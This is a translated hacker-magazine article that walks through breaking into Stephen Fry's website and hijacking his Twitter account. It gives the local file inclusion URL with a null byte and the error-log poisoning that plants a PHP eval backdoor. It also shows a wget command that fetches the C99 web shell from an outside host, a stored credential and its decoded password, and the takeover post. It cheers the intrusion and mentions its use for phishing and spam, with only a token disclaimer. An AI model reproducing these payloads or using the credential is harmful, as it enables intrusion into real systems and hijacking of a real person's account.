|
Watching the feeds, one’s can often face the news that another Twitter
account of some Britney Spears, John McCain and others of that ilk was hacked.
Typically, these hacks do not make much effort and are hacked using "brute force”
(stars like to set some simple passwords). But brute force – is not our method.
British comedian, "The Hitchhiker's Guide to the Galaxy" and "V - for Vendetta"
film star, Stephen Fry, can be taken as an example. I will tell you about how to
"fuck” a micro blog famous personality quickly and easily play-by-play.
Micro-blogging
Let’s start with the thing that the actor's official website is located at
http://www.stephenfry.com. It represents a collection of posts from his blog and
forum, gathering of advertising banners and some promotional trailers
advertising the works of Fry. Also you can see actors’ Tweets on stephenfry.com
/ clubfry / twitter. Inasmuch as Twitter provides its own API to any interested
person, then it seemed logical that the password is stored somewhere in the
micro-blog configuration map:). In fact, our ultimate goal is a complete control
over the actor twitter-account (twitter.com / stephenfry), currently having
873.496 (!) followers.
Bug Search
First off, let’s inspect the site for some installed public engines. Big
slice of luck, here we’ve found my favorite WordPress blog engine and the
infamous phpBB forum. After browsing the main blog page source (stephenfry.com /
blog), one can observe the following:
<meta name="generator" content="WordPress 2.5.1" />
Unfortunately, at the moment I had no necessary exploits for the 2.5.1
WordPress version at hand, and had to ditch that option.
Then we should know the phpBB forum version. This can be done in different
ways, but the most convenient is to follow the link to the engine versions
history at stephenfry.com / forum / docs / CHANGELOG.html. Inasmuch as the last
change was "Changes since 2.0.20", we can safely bottom-line that the forum
version is far beyond a real usability of security vulnerabilities (unless, of
course, considering all kinds of XSS and CSRF bugs).
Feeling no great desire to use known XSS for this phpBB version, I asked the
great and mighty Google for an advice with the query:
site:stephenfry.com filetype:php
As an answer to this uncomplicated query the search engine gave a lot of
references to the actor web site PHP-files. I was immediately interested in the
link tephenfry.com/section.php?section=clubfry&subsection=twitter.
Here we have two options: we can either send the database a request with the
appropriate parameters, or do template files include.
I made the following request having decided to check the second option
immediately:
stephenfry.com/section.php?section=clubfry& subsection=/../../../../../../../../../../../../../../../../etc/passwd%00
At that site engine happily gave the contents of / etc / passwd:). There was
found the vulnerability of local include working with null-byte! It's all over
bar the shouting – we had just to find out which file can be stuffed with
malicious code.
Helpful logs
If you’ve read my article in the last ][ number, you should know about the
wonderful way to inject your code through the various symbolic links located in
/ proc / self / *.
Let’s try using storage of local variables /proc/self/environ:
stephenfry.com/section.php?section=clubfry&subsection=/../../../../../../../../../../../../../../../../proc/self/environ%00
Unfortunately, / proc / self / environ is not available :(.
Now it’s time to try to include our code to the log files. By trial and error
we’ve revealed that Apache error_log locates at /proc/self/fd/2 (we’ll use it
cause the access_log of a common web site is certainly about few gigabytes, that
would be immune to LFI).
error_log is often written without filtering the referer variable, which can
be injected with our PHP-code. The only thing that’s left to do is to cause the
error, which will be written to the log file. The most easily achievable is the
following error format:
[Sat Jul 11 23:39:21 2009] [error] [client x.x.x.x] client sent HTTP/1.1
request without hostname (see RFC2616 section 14.23): /
To get such an error and write our "evil-code” we just need to send a blank
header to the appropriate host. You can do it like this:
z:/usr/local/bin/curl.exe "http://www.stephenfry.com/" -H "Host:" --referer
""
As a result, our code will be written to the error_log:
[Sat Jul 11 23:39:21 2009] [error] [client x.x.x.x] client sent HTTP/1.1
request without hostname (see RFC2616 section 14.23): /, referer: <?php eval($_GET[cmd]);
?>
- We’ll be able to perform any commands using the following link:
http://www.stephenfry.com/section.php?section=clubfry&
subsection=/../../../../../../../../../../../../../../../../proc/self/fd/2%00&cmd=phpinfo();
The Penetration
After further browsing and use of the find. /-Type d-perm 0777 command –
we’ve found out that there are several writable directories at the server. I
chose / home / fry / public_html / img / blog_thumbs / directory and uploaded
the C99madShell (it was named like blog.php) there with wget agent:
http://www.stephenfry.com/section.php?section=clubfry&subsection=/../../../../../../../../../../../../../../../../proc/self/fd/2%00&cmd=system('wget
-O /home/fry/public_html/img/blog_thumbs/blog.php
http://madnet.name/files/download/9_c99madshell.php');
The main thing is to get the access to the Fry’s adored Twitter. We will
start our search with browsing the index.php file source at as / home / fry /
public_html:
<?php
include_once("lib/sf_main.php");
$aryBlogEntry = fnGetHomepageBlogArray();
$aryBlogStats = fnGetBlogStatsArray();
$aryForumStats = fnGetForumStatsArray();
$strSection = "";
$strSubSection = "";
include(SF_BASE_DIR."/templates/navigation/header.php");
Then the lib/sf_main.php:
<?php
include_once "sf_constants.php";
include_once "sf_db_class.php";
include_once "sf_template.php";
include_once "sf_cache_functions.php";
...
?>
And at last the lib/sf_constants.php:
<?php
...
// Twitter
define('SF_TWITTER_USER','stephenfry');
define('SF_TWITTER_PASSWORD','dzQxbGE4eW9uMzd3bzQ=');
...
?>
As seen, the variable SF_TWITTER_PASSWORD is base64 encoded, so we just have
to miss this value through the base64_decode function and we’ll get the final
password w41la8yon37wo4.
The ultimate goal has almost been reached! We’ve received the password (by
the way, such password seems hardly possible to be found by the brute force).
The main thing that has left is to enter the actor's account at twitter.com, and
leave there a message for future generations.
Twitter
Now we enter the twitter.com, fill in the appropriate username and password
stephenfry w41la8yon37wo4 and find ourselves logged in to the Fry’s account :).
After login the service gives us a simple question: "What are you doing?", which
we answer with the following happy phrase "I'll be watching you! From Russia
with love :)". Within a few minutes after sending my message, Stephen fans began
to post the answers:
RegNomSongs by The Police and Matt Monroe. This is a quiz, right? RT @stephenfry:
I'll be watching you! From Russia with love :)
---
lokimaros@stephenfry How about how Дмитрий Дмитриевич Шостакович radically
changed your life and listening habits.
---
NikkiG57@stephenfry tell them about Russia, Wagner and your performance at
Glastonbury
---
valpanna@stephenfry I am afraid, very afraid!
---
Benn2100@stephenfry I'll be watching you too
---
thisheartbeatz@stephenfry have fun in RUSSIA! B)
---
wrathofagony@stephenfry cool in Russia? how is it???
---
CybrHwk@stephenfry Your in Russia? Where about in Russia are you Stephen?
---
chriscattaneoRT @stephenfry: I'll be watching you! From Russia with love :) ok
James!
---
Betty_Bitch@stephenfry and i'll be watching you on dave, from Wales with love :)
---
sjoes@stephenfry Are you in still Russia?
---
mio@stephenfry wow o_0 where are you now, Stephen?
It seems like no one guessed that the actor's account was hacked, and the
phrase "From Russia with love" does not mean that Fry is in Russia.
Large-scale flash mob
Having seized some "star” personality account at some popular online service,
you can arrange not only the large-scale flash mob, but also a full-fledged scam
/ phishing / spam attack. But, of course, the most amusing thing in such
situation was the recent message about the Britney Spears death posted on her
Twitter :).
P.S. I deleted that post from his micro-blog a few minutes later, cause my
delicate mental organization didn’t allow me to injure a huge army of Stephen
Fry fans.
INFO
Stephen Fry (Stephen John Fry) - British writer, actor and playwright. The
role in ("The Black Adder", "A Bit of Fry and Laurie" and "Jeeves and Wooster")
the television comedy series won him glory. Outside the UK Fry is known mainly
for the Oscar Wilde role in the "Wilde" (1997) movie. Fry is the author of
articles and columns in several leading newspapers and magazines in addition to
writing scripts and texts for television, radio, cinema and theater.
DANGER
The above article is the product of a diseased imagination of the author. Any
overlap with existing site is accident. Neither the editors nor the author shall
not be liable for any possible damage caused by the materials of this article.
|